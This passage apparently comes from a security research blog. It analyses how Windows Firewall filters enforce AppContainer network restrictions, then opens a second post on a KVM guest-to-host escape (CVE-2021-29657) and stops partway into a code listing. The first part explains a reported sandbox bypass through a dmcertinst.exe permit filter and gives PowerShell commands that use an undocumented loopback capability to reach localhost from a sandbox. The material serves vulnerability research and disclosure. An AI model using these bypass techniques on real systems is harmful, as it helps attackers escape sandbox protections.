One odd thing is in the FWPM_CONDITION_IP_REMOTE_ADDRESS condition. It seems to match on all possible IPv4 addresses. Shouldn't this exclude network addresses on our local “private” network? At the very least you'd assume this would block the reserved IP address ranges from RFC1918? The key to understanding this is the profile ID conditions, which are both set to Public. The computer I'm running these commands on has a single network interface configured to the public profile as shown:

Image showing the option of either Public or Private network profiles.

Therefore the firewall is configured to treat all network addresses in the same context, granting the internetClient capability access to any address including your local “private” network. This might be unexpected. In fact if you enumerate all the filters on the machine you won't find any filter to match the privateNetworkClientServer capability and using the capability will not grant access to any network resource.

If you switch the network profile to Private, you'll find there are now three “InternetClient Default Rule” filters (note that on Windows 11 there will only be one, as it uses the OR'ing feature of conditions mentioned above to merge the three rules together).

Name       : InternetClient Default Rule

Action Type: Permit

...

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 10.0.0.0

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private

...

Name       : InternetClient Default Rule

Action Type: Permit

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 239.255.255.255 High: 255.255.255.255

...

Name       : InternetClient Default Rule

Action Type: Permit

...

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 10.255.255.255 High: 224.0.0.0

...

As you can see, the first filter covers addresses 0.0.0.0 to 10.0.0.0. The machine's private network is 10.0.0.0/8. The profile IDs are also now set to Private. The other two filters cover the rest of the address space, so together the rules exclude the entire 10.0.0.0/8 network as well as the multicast group addresses from 224.0.0.0 to 239.255.255.255.
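
The effect of the three ranges can be checked with a few lines of Python. This is only a sketch: the range values are copied from the filter output above, the function name is made up, and it assumes the Low and High bounds are inclusive, which the output itself doesn't confirm.

```python
import ipaddress

# (Low, High) pairs copied from the three Private-profile filters.
PERMITTED_RANGES = [
    ("0.0.0.0", "10.0.0.0"),
    ("10.255.255.255", "224.0.0.0"),
    ("239.255.255.255", "255.255.255.255"),
]


def internet_client_permits(addr):
    """True if addr falls inside any of the three permitted ranges."""
    ip = ipaddress.IPv4Address(addr)
    return any(
        ipaddress.IPv4Address(low) <= ip <= ipaddress.IPv4Address(high)
        for low, high in PERMITTED_RANGES
    )


for addr in ("8.8.8.8", "10.0.0.1", "192.168.1.1", "224.0.0.251"):
    print(addr, internet_client_permits(addr))
```

Note that 192.168.1.1 is still permitted in this model. The excluded range follows the machine's actual private network (10.0.0.0/8 here), not the full set of RFC1918 ranges.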

The profile ID conditions are important here if you have more than one network interface. For example if you have two, one Public and one Private, you would get a filter for the Public network covering the entire IP address range and the three Private ones excluding the private network addresses. The Public filter won't match if the network traffic is being sent from the Private network interface preventing the application without the right capability from accessing the private network.

Speaking of which, we can also now identify the filters which will match the private network capability. There are two, covering the private network range and the multicast range. We'll just show one of them.

Name       : PrivateNetwork Outbound Default Rule

Action Type: Permit

Key        : e0194c63-c9e4-42a5-bbd4-06d90532d5e6

Id         : 71640

Description: PrivateNetwork Outbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 36029209335832512

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 10.0.0.0 High: 10.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)

We can see in the FWPM_CONDITION_ALE_USER_ID condition that the connection would be permitted if the creator has the privateNetworkClientServer capability, which is S-1-15-3-3 in SDDL.

It is slightly ironic that the Public network profile is probably recommended even if you're on your own private network (Windows 11 even makes the recommendation explicit as shown below) in that it should reduce the exposed attack surface of the device from others on the network. However if an AppContainer application with the internetClient capability could be compromised it opens up your private network to access where the Private profile wouldn't.

Image showing the option of either Public or Private network profiles. This is from Windows 11 where Public is marked as recommended.

Aside: one thing you might wonder is, if your network interface is marked as Private and the AppContainer application only has the internetClient capability, what happens if your DNS server is your local router at 10.0.0.1? Wouldn't the application be blocked from making DNS requests? Windows has a DNS client service which is typically always running. This service is what usually makes DNS requests on behalf of applications, as it allows the results to be cached. The RPC server which the service exposes allows callers which have any of the three network capabilities to connect to it and make DNS requests, avoiding the problem. Of course, if the service is disabled, in-process DNS lookups will start to be used, which could result in weird name resolution issues depending on your network configuration.

We can now understand how issue 2207 I reported to Microsoft bypasses the capability requirements. If in the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer for an outbound connection there are Permit filters which are evaluated before the “Block Outbound Default Rule” filter then it might be possible to avoid needing capabilities.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted |

Where-Object SubLayerKeyName -eq MICROSOFT_DEFENDER_SUBLAYER_WSH |

Select-Object ActionType, Name

...

Permit     Allow outbound TCP traffic from dmcertinst.exe

Permit     Allow outbound TCP traffic from omadmclient.exe

Permit     Allow outbound TCP traffic from deviceenroller.exe

Permit     InternetClient Default Rule

Permit     InternetClientServer Outbound Default Rule

Block      Block all outbound traffic from SearchFilterHost

Block      Block outbound traffic from dmcertinst.exe

Block      Block outbound traffic from omadmclient.exe

Block      Block outbound traffic from deviceenroller.exe

Block      Block Outbound Default Rule

Block      WSH Default Outbound Block

PS> Get-FwFilter -Id 72753 | Format-FwFilter

Name       : Allow outbound TCP traffic from dmcertinst.exe

Action Type: Permit

Key        : 5237f74f-6346-4038-a48d-4b779f862e65

Id         : 72753

Description:

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : Indexed

Weight     : 422487342972928

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_APP_ID  Equal    

\device\harddiskvolume3\windows\system32\dmcertinst.exe

FWPM_CONDITION_IP_PROTOCOL Equal     Tcp

As we can see in the output there are quite a few Permit filters before the “Block Outbound Default Rule” filter, and of course I've also cropped the list to make it smaller. If we inspect the “Allow outbound TCP traffic from dmcertinst.exe” filter we find that it only matches on the App ID and the IP protocol. As it doesn't have any AppContainer-specific checks, any socket created in the context of a dmcertinst process would be permitted to make TCP connections.

Once the “Allow outbound TCP traffic from dmcertinst.exe” filter matches, the sublayer evaluation is terminated and it never reaches the “Block Outbound Default Rule” filter. This is fairly trivial to exploit as long as the AppContainer process is allowed to spawn new processes, which is allowed by default.
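
The ordering problem can be modelled in a few lines of Python. This is a deliberately simplified sketch of first-match evaluation within a single sublayer, not how WFP is implemented. The two Permit weights are taken from the Format-FwFilter output in this post, while the Block filter's weight and its match condition are placeholders I've assumed for illustration.

```python
DMCERTINST = r"\device\harddiskvolume3\windows\system32\dmcertinst.exe"

FILTERS = [
    {
        "name": "Allow outbound TCP traffic from dmcertinst.exe",
        "action": "Permit",
        "weight": 422487342972928,  # from the filter output
        "match": lambda c: c["app_id"] == DMCERTINST and c["protocol"] == "Tcp",
    },
    {
        "name": "InternetClient Default Rule",
        "action": "Permit",
        "weight": 412316868544,  # from the filter output
        "match": lambda c: c["package_sid"] is not None
        and "internetClient" in c["capabilities"],
    },
    {
        "name": "Block Outbound Default Rule",
        "action": "Block",
        "weight": 1,  # placeholder: only needs to sort below the Permit filters
        "match": lambda c: c["package_sid"] is not None,  # assumed condition
    },
]


def evaluate_sublayer(filters, conn):
    """Walk filters from highest to lowest weight; the first match decides."""
    for f in sorted(filters, key=lambda f: f["weight"], reverse=True):
        if f["match"](conn):
            return f["action"], f["name"]
    return None, None


sandboxed = {
    "app_id": r"\device\harddiskvolume3\windows\system32\notepad.exe",
    "protocol": "Tcp",
    "package_sid": "TEST",
    "capabilities": set(),
}
print(evaluate_sublayer(FILTERS, sandboxed))
print(evaluate_sublayer(FILTERS, dict(sandboxed, app_id=DMCERTINST)))
```

The same sandboxed token with no capabilities is blocked when the socket is created by an arbitrary executable, but permitted when the creating process is dmcertinst.exe, because the App ID filter is reached first.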

Server Capabilities

What about the internetClientServer capability, how does that function? First, there's a second set of outbound filters to cover the capability with the same network addresses as the base internetClient capability. The only difference is the FWPM_CONDITION_ALE_USER_ID condition checks for the internetClientServer (S-1-15-3-2) capability instead. For inbound connections the FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 layer contains the filter.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match InternetClientServer |

Format-FwFilter

Name       : InternetClientServer Inbound Default Rule

Action Type: Permit

Key        : 45c5f1d5-6ad2-4a2a-a605-4cab7d4fb257

Id         : 72470

Description: InternetClientServer Inbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 824633728960

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)

The example shows the filter for a Public network interface granting an AppContainer application the ability to receive network connections. However, this will only be permitted if the socket creator has the internetClientServer capability. Note that there would be similar rules for the private network if the network interface is marked as Private, but only granting access with the privateNetworkClientServer capability.

As mentioned earlier, just because an application has one of these capabilities doesn't mean it can receive network connections. The default configuration will block the inbound connection. However, when a UWP application is installed and requires one of the two server capabilities, the AppX installer service registers the AppContainer profile with the Windows Defender Firewall service. This adds a filter to permit the AppContainer package to receive inbound connections. For example, the following is for the Microsoft Photos application, which is typically installed by default:

PS> Get-FwFilter -Id 68299 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : @{Microsoft.Windows.Photos_2021...

Action Type: Permit

Key        : 7b51c091-ed5f-42c7-a2b2-ce70d777cdea

Id         : 68299

Description: @{Microsoft.Windows.Photos_2021...

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : Indexed

Weight     : 10376294366095343616

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Equal    

microsoft.windows.photos_8wekyb3d8bbwe

FWPM_CONDITION_ALE_USER_ID    Equal     O:SYG:SYD:(A;;CCRC;;;S-1-5-21-3563698930-1433966124...

<Owner> (Defaulted) : NT AUTHORITY\SYSTEM

<Group> (Defaulted) : NT AUTHORITY\SYSTEM

<DACL>

DOMAIN\alice: (Allowed)(None)(Full Access)

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection,...

APPLICATION PACKAGE AUTHORITY\Your home or work networks:...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Full Access)

The filter only checks that the package SID matches and that the socket creator is a specific user in an AppContainer. Note this rule doesn't do any checking on the executable file, remote IP address, port or profile ID. Once an installed AppContainer application is granted a server capability it can act as a server through the firewall for any traffic type or port.

A normal application could abuse this configuration to run a network service without needing the administrator access normally required to grant the executable access. All you'd need to do is create an arbitrary AppContainer process in the permitted package and grant it the internetClientServer and/or the privateNetworkClientServer capabilities. If there isn't an application installed which has the appropriate firewall rules, a non-administrator user can install any signed application with the appropriate capabilities to add the firewall rules. While this clearly circumvents the expected administrator requirements for new listening processes, it's presumably by design.

Localhost Access

One of the specific restrictions imposed on AppContainer applications is that access to localhost is blocked. The purpose is to make it more difficult to exploit local network services which might not correctly handle AppContainer callers, which could otherwise result in a sandbox escape. Let's test the behavior out and try to connect to a localhost service.

PS> $token = Get-NtToken -LowBox -PackageSid "LOOPBACK"

PS> Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because

connected host has failed to respond 127.0.0.1:445"

If you compare the error to when we tried to connect to an internet address without the appropriate capability you'll notice it's different. When we connected to the internet we got an immediate error indicating that access isn't permitted. However, for localhost we instead get a timeout error, which is preceded by a multi-second delay. Why the difference? Getting the network event which corresponds to the connection and displaying the blocking filter shows something interesting.

PS> Get-FwFilter -Id 69039 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: Block

Key        : a58394b7-379c-43ac-aa07-9b620559955e

Id         : 69039

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551614

Conditions :

FieldKeyName               MatchType   Value

------------               ---------   -----

FWPM_CONDITION_FLAGS       FlagsAllSet IsLoopback

FWPM_CONDITION_ALE_USER_ID Equal      

O:LSD:(A;;CC;;;AC)(A;;CC;;;S-1-15-3-1)(A;;CC;;;S-1-15-3-2)...

<Owner> : NT AUTHORITY\LOCAL SERVICE

<DACL>

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES...

APPLICATION PACKAGE AUTHORITY\Your Internet connection...

APPLICATION PACKAGE AUTHORITY\Your Internet connection, including...

APPLICATION PACKAGE AUTHORITY\Your home or work networks...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Match)

Everyone: (Allowed)(None)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(None)(Match)

The blocking filter is not in the connect layer as you might expect, instead it's in the receive/accept layer. This explains why we get a timeout rather than immediate failure: the “inbound” connection request is being dropped as per the default configuration. This means the TCP client waits for the response from the server, until it eventually hits the timeout limit.

The second interesting thing to note about the filter is it's not based on an IP address such as 127.0.0.1. Instead it's using a condition which checks for the IsLoopback condition flag (FWP_CONDITION_FLAG_IS_LOOPBACK in the SDK). This flag indicates that the connection is being made through the built-in loopback network, regardless of the destination address. Even if you access the public IP addresses for the local network interfaces the packets will still be routed through the loopback network and the condition flag will be set.

The user ID check is odd, in that the security descriptor matches either AppContainer or non-AppContainer processes. This is of course the point: if it didn't match both then it wouldn't block the connection. However, it's not immediately clear what its actual purpose is if it just matches everything. In my opinion, it adds a risk that the filter will be ignored if the socket creator has disabled the Everyone group. This condition was modified since Windows 8 to support LPAC, so it's presumably intentional.

You might ask, if the filter would block any loopback connection regardless of whether it's in an AppContainer, how do loopback connections work for normal applications? Wouldn't this filter always match and block the connection? Unsurprisingly there are some additional permit filters before the blocking filter, as shown below.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match AppContainerLoopback | Format-FwFilter

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsAppContainerLoopback

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsReserved

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsNonAppContainerLoopback

The three filters shown above only check for different condition flags, and you can find documentation for the flags on MSDN. Starting at the bottom we have a check for IsNonAppContainerLoopback. This flag is set on a connection when the loopback connection is between non-AppContainer created sockets. This filter is what grants normal applications loopback access. It's also why an application can listen on localhost even if it's not granted access to receive connections from the network in the firewall configuration.

In contrast the first filter checks for the IsAppContainerLoopback flag. Based on the documentation and the name, you might assume this would allow any AppContainer to use loopback to any other. However, based on testing this flag is only set if the two AppContainers have the same package SID. This is presumably to allow an AppContainer to communicate with itself or other processes within its package through loopback sockets.

This flag is also, I suspect, the reason that connecting to a loopback socket is handled in the receive layer rather than the connect layer. Perhaps WFP can't easily tell ahead of time whether both the connecting and receiving sockets will be in the same AppContainer package, so it delays resolving that until the connection has been received. This does lead to the unfortunate behavior that blocked loopback sockets timeout rather than fail immediately.
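
The interaction between the loopback flags and the receive layer filters described so far can be sketched as a toy Python model. The bit positions are illustrative only (the real values are defined in the Windows SDK headers), the function names are made up, and the IsReserved permit filter is left out because its behavior is covered separately. The rule that a mixed AppContainer/non-AppContainer connection gets neither permit flag is inferred from the blocked connection test earlier, not from documentation.

```python
# Illustrative bit positions; not the SDK values.
IS_LOOPBACK = 1 << 0
IS_APPCONTAINER_LOOPBACK = 1 << 1
IS_NON_APPCONTAINER_LOOPBACK = 1 << 2


def flags_all_set(value, mask):
    """FlagsAllSet match type: every bit in mask must be present in value."""
    return (value & mask) == mask


def loopback_flags(client_package, server_package):
    """Arguments are package SIDs, or None for a non-AppContainer process."""
    flags = IS_LOOPBACK
    if client_package is None and server_package is None:
        flags |= IS_NON_APPCONTAINER_LOOPBACK
    elif client_package is not None and client_package == server_package:
        flags |= IS_APPCONTAINER_LOOPBACK
    return flags


def recv_accept_decision(flags):
    """Permit filters come before the AppContainerLoopback block filter."""
    for permit_mask in (IS_APPCONTAINER_LOOPBACK, IS_NON_APPCONTAINER_LOOPBACK):
        if flags_all_set(flags, permit_mask):
            return "Permit"
    if flags_all_set(flags, IS_LOOPBACK):
        return "Block"
    return "NoMatch"


print(recv_accept_decision(loopback_flags(None, None)))        # normal apps
print(recv_accept_decision(loopback_flags("LOOPBACK", None)))  # sandbox to service
print(recv_accept_decision(loopback_flags("PKG_A", "PKG_A")))  # same package
```

In this model the decision needs both endpoints' package SIDs, which is consistent with the check living in the receive layer rather than the connect layer.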

The final flag, IsReserved, is more curious. MSDN of course says this is “Reserved for future use.”, and the future is now. Though checking back at the filters in Windows 8.1 also shows it being used, so if it was reserved it wasn't for very long. The obvious conclusion is that this flag is really a “Microsoft Reserved” flag. By that I mean it's actually used, but Microsoft is as yet unwilling to publicly document it.

What is it used for? AppContainers are supposed to be a capability based system, where you can just add new capabilities to grant additional privileges. It would make sense to have a loopback capability to grant access, which could be restricted to only being used for debugging purposes. However, it seems that loopback access was so beyond the pale for the designers that instead you can only grant access for debug purposes through an administrator only API. Perhaps it's related?

PS> Add-AppModelLoopbackException -PackageSid "LOOPBACK"

PS> Get-FwFilter -AleLayer ConnectV4 |

Where-Object Name -Match AppContainerLoopback |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: CalloutInspection

Key        : dfe34c0f-84ca-4af1-9d96-8bf1e8dac8c0

Id         : 54912247

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551615

Callout Key: FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_USER_ID Equal     D:(A;NP;CC;;;WD)(A;NP;CC;;;AN)(A;NP;CC;;;S-1-15-3-1861862962-...

<DACL>

Everyone: (Allowed)(NoPropagateInherit)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(NoPropagateInherit)(Match)

PACKAGE CAPABILITY\LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

First we add a loopback exemption for the LOOPBACK package name. We then look for the AppContainerLoopback filters in the connect layer. The one we're interested in is shown. The first thing to note is that the action type is set to CalloutInspection. This might seem slightly surprising, as you would expect it to do something more than inspect the traffic.

The name of the callout, FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4 gives the game away. The fact that it has RESERVED in the name can't be a coincidence. This callout is one implemented internally by Windows in the TCPIP!WfpAlepDbgLowboxSetByPolicyLoopbackCalloutClassify function. This name now loses all mystery and pretty much explains what its purpose is, which is to configure the connection so that the IsReserved flag is set when the receive layer processes it.

The user ID here is equally important. When you register the loopback exemption you only specify the package SID, which is shown in the output as the last “LOOPBACK” line. Therefore you'd assume you'd need to always run your code within that package. However, the penultimate line is “PACKAGE CAPABILITY\LOOPBACK” which is my module's way of telling you that this is the package SID, but converted to a capability SID. This is basically changing the first relative identifier in the SID from 2 to 3.
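
The SID conversion itself is simple enough to sketch in Python. The function name and the example SID below are made up for illustration (the real LOOPBACK package SID is truncated in the output above, so it isn't reproduced here), and the sketch only assumes what the text states: both SIDs share the S-1-15 prefix and differ in the first relative identifier.

```python
def package_sid_to_capability_sid(package_sid):
    """Rewrite S-1-15-2-... as S-1-15-3-..., keeping the remaining RIDs."""
    parts = package_sid.split("-")
    # parts is ["S", revision, authority, first RID, remaining RIDs...]
    if len(parts) < 5 or parts[:3] != ["S", "1", "15"] or parts[3] != "2":
        raise ValueError("not an AppContainer package SID: " + package_sid)
    parts[3] = "3"
    return "-".join(parts)


# Hypothetical package SID, used only to show the transformation.
example = "S-1-15-2-1-2-3-4-5-6-7"
print(package_sid_to_capability_sid(example))
```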

We can use this behavior to simulate a generic loopback exemption capability. It allows you to create an AppContainer sandboxed process which has access to localhost and which isn't restricted to a particular package. This would be useful for applications such as Chrome to implement a network facing sandboxed process and would work from Windows 8 through 11. Unfortunately it's not officially documented so can't be relied upon. An example demonstrating the use of the capability is shown below.

PS> $cap = Get-NtSid -PackageSid "LOOPBACK" -AsCapability

PS> $token = Get-NtToken -LowBox -PackageSid "TEST" -cap $cap

PS> $sock = Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

PS> $sock.Client.RemoteEndPoint

AddressFamily Address   Port

------------- -------   ----

 InterNetwork 127.0.0.1  445

Conclusions

That wraps up my quick overview of how AppContainer network restrictions are implemented using the Windows Firewall. I covered the basics of the Windows Firewall as well as some of the tooling I wrote to analyze its configuration. This background information allowed me to explain why the issue I reported to Microsoft worked. I also pointed out some of the quirks of the implementation which you might find of interest.

Having a good understanding of how a security feature works is an important step towards finding security issues. I hope that by providing both the background and tooling other researchers can also find similar issues and try and get them fixed.

An EPYC escape: Case-study of a KVM breakout

Posted by Felix Wilhelm, Project Zero

Introduction

KVM (for Kernel-based Virtual Machine) is the de-facto standard hypervisor for Linux-based cloud environments. Outside of Azure, almost all large-scale cloud and hosting providers are running on top of KVM, turning it into one of the fundamental security boundaries in the cloud.

In this blog post I describe a vulnerability in KVM’s AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. To the best of my knowledge, this is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU. The discussed bug was assigned CVE-2021-29657, affects kernel versions v5.10-rc1 to v5.12-rc6 and was patched at the end of March 2021. As the bug only became exploitable in v5.10 and was discovered roughly 5 months later, most real world deployments of KVM should not be affected. I still think the issue is an interesting case study in the work required to build a stable guest-to-host escape against KVM and hope that this writeup can strengthen the case that hypervisor compromises are not only theoretical issues.

I start with a short overview of KVM’s architecture, before diving into the bug and its exploitation.

KVM

KVM is a Linux based open source hypervisor supporting hardware accelerated virtualization on x86, ARM, PowerPC and S/390. In contrast to the other big open source hypervisor Xen, KVM is deeply integrated with the Linux Kernel and builds on its scheduling, memory management and hardware integrations to provide efficient virtualization.

KVM is implemented as one or more kernel modules (kvm.ko plus kvm-intel.ko or kvm-amd.ko on x86) that expose a low-level IOCTL-based API to user space processes over the /dev/kvm device. Using this API, a user space process (often called VMM for Virtual Machine Manager) can create new VMs, assign vCPUs and memory, and intercept memory or IO accesses to provide access to emulated or virtualization-aware hardware devices. QEMU has been the standard user space choice for KVM-based virtualization for a long time, but in the last few years alternatives like LKVM, crosvm or Firecracker have started to become popular.

While KVM’s reliance on a separate user space component might seem complicated at first, it has a very nice benefit: Each VM running on a KVM host has a 1:1 mapping to a Linux process, making it manageable using standard Linux tools.

This means for example, that a guest's memory can be inspected by dumping the allocated memory of its user space process or that resource limits for CPU time and memory can be applied easily. Additionally, KVM can offload most work related to device emulation to the userspace component. Outside of a couple of performance-sensitive devices related to interrupt handling, all of the complex low-level code for providing virtual disk, network or GPU access can be implemented in userspace.  

When looking at public writeups of KVM-related vulnerabilities and exploits it becomes clear that this design was a wise decision. The large majority of disclosed vulnerabilities and all publicly available exploits affect QEMU and its support for emulated/paravirtualized devices.

Even though KVM’s kernel attack surface is significantly smaller than the one exposed by a default QEMU configuration or similar user space VMMs, a KVM vulnerability has advantages that make it very valuable for an attacker:

  • Whereas user space VMMs can be sandboxed to reduce the impact of a VM breakout, no such option is available for KVM itself. Once an attacker is able to achieve code execution (or similarly powerful primitives like write access to page tables) in the context of the host kernel, the system is fully compromised.
  • Due to the somewhat poor security history of QEMU, new user space VMMs like crosvm or Firecracker are written in Rust, a memory safe language. Of course, there can still be non-memory safety vulnerabilities or problems due to incorrect or buggy usage of the KVM APIs, but using Rust effectively prevents the large majority of bugs that were discovered in C-based user space VMMs in the past.
  • Finally, a pure KVM exploit can work against targets that use proprietary or heavily modified user space VMMs. While the big cloud providers do not go into much detail about their virtualization stacks publicly, it is safe to assume that they do not depend on an unmodified QEMU version for their production workloads. In contrast, KVM’s smaller code base makes heavy modifications unlikely (and KVM’s contributor list points at a strong tendency to upstream such modifications when they exist).  

With these advantages in mind, I decided to spend some time hunting for a KVM vulnerability that could be turned into a guest-to-host escape. In the past, I had some success with finding vulnerabilities in KVM’s support for nested virtualization on Intel CPUs, so reviewing the same functionality for AMD seemed like a good starting point. This is even more true because the recent increase of AMD’s market share in the server segment means that KVM’s AMD implementation is suddenly becoming a more interesting target than it was in recent years.

Nested virtualization, the ability for a VM (called L1) to spawn nested guests (L2), was also a niche feature for a long time. However, due to hardware improvements that reduce its overhead and increasing customer demand it’s becoming more widely available. For example, Microsoft is heavily pushing for Virtualization-based Security as part of newer Windows versions, requiring nested virtualization to support cloud-hosted Windows installations. KVM enables support for nested virtualization on both AMD and Intel by default, so if an administrator or the user space VMM does not explicitly disable it, it’s part of the attack surface for a malicious or compromised VM.

AMD’s virtualization extension is called SVM (for Secure Virtual Machine) and in order to support nested virtualization, the host hypervisor needs to intercept all SVM instructions that are executed by its guests, emulate their behavior and keep its state in sync with the underlying hardware. As you might imagine, implementing this correctly is quite difficult with a large potential for complex logic flaws, making it a perfect target for manual code review.

The Bug

Before diving into the KVM codebase and the bug I discovered, I want to quickly introduce how AMD SVM works to make the rest of the post easier to understand. (For a thorough documentation see AMD64 Architecture Programmer’s Manual, Volume 2: System Programming Chapter 15.) SVM adds support for 6 new instructions to x86-64 if SVM support is enabled by setting the SVME bit in the EFER MSR. The most interesting of these instructions is VMRUN, which (as its name suggests) is responsible for running a guest VM. VMRUN takes an implicit parameter via the RAX register pointing to the page-aligned physical address of a data structure called “virtual machine control block” (VMCB), which describes the state and configuration of the VM.

The VMCB is split into two parts: First, the State Save area, which stores the values of all guest registers, including segment and control registers. Second, the Control area, which describes the configuration of the VM. The Control area describes the virtualization features enabled for a VM, sets which VM actions are intercepted to trigger a VM exit and stores some fundamental configuration values such as the page table address used for nested paging.
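
As a rough illustration of the address VMRUN receives in RAX, the Python sketch below checks the page alignment requirement and computes where the two areas would sit inside the 4KB VMCB page. The offsets (Control area at 0x000, State Save area at 0x400) are my reading of the VMCB layout in the AMD manual and are an assumption here rather than something stated in this post, and the function name is made up.

```python
PAGE_SIZE = 0x1000           # the VMCB occupies one 4KB page
VMCB_CONTROL_OFFSET = 0x000  # assumed: Control area starts the page
VMCB_SAVE_OFFSET = 0x400     # assumed: State Save area follows it


def vmcb_areas(vmcb_pa):
    """Return the physical addresses of the two VMCB areas."""
    if vmcb_pa % PAGE_SIZE != 0:
        raise ValueError("VMCB address must be page-aligned: %#x" % vmcb_pa)
    return {
        "control": vmcb_pa + VMCB_CONTROL_OFFSET,
        "save": vmcb_pa + VMCB_SAVE_OFFSET,
    }


areas = vmcb_areas(0x12345000)
print({name: hex(addr) for name, addr in areas.items()})
```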

If the VMCB is correctly prepared (and we are not already running in a VM), VMRUN will first save the host state in a memory region called the host save area, whose address is configured by writing a physical address to the VM_HSAVE_PA MSR. Once the host state is saved, the CPU switches to the VM context and VMRUN only returns once a VM exit is triggered for one reason or another.

An interesting aspect of SVM is that a lot of the state recovery after a VM exit has to be done by the hypervisor. Once a VM exit occurs, only RIP, RSP and RAX are restored to the previous host values and all other general purpose registers still contain the guest values. In addition, a full context switch requires manual execution of the VMSAVE/VMLOAD instructions which save/load additional system registers (FS, GS, LDTR, STAR, LSTAR …) from memory.

For nested virtualization to work, KVM intercepts execution of the VMRUN instruction and creates its own VMCB based on the VMCB the L1 guest prepared (called vmcb12 in KVM terminology). Of course, KVM can’t trust the guest provided vmcb12 and needs to carefully validate all fields that end up in the real VMCB that gets passed to the hardware (known as vmcb02).

Most of KVM’s code for nested virtualization on AMD is implemented in arch/x86/kvm/svm/nested.c and the code that intercepts VMRUN instructions of nested guests is implemented in nested_svm_vmrun:

int nested_svm_vmrun(struct vcpu_svm *svm)
{
        int ret;
        struct vmcb *vmcb12;
        struct vmcb *hsave = svm->nested.hsave;
        struct vmcb *vmcb = svm->vmcb;
        struct kvm_host_map map;
        u64 vmcb12_gpa;
